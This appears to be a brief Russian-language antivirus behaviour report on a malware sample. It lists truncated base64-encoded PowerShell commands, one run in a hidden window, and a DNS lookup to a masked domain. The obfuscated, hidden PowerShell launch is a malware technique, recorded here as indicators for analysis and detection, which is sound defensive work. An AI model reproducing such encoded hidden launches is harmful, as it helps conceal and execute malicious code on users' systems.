Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAG8AZwBqAHMAegBpAHIAdAB6AHQAYgB4AD0AJwBFAGsAegB6AHEAZQBzAHIAZQB0AHAAZwAnADsAJABQAGIAbwB1AGEAegB3AH...
- DNS ASK re###tanki.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAG8AZwBqAHMAegBpAHIAdAB6AHQAYgB4AD0AJwBFAGsAegB6AHEAZQBzAHIAZQB0AHAAZwAnADsAJABQAGIAbwB1AGEAegB3AH...' (со скрытым окном)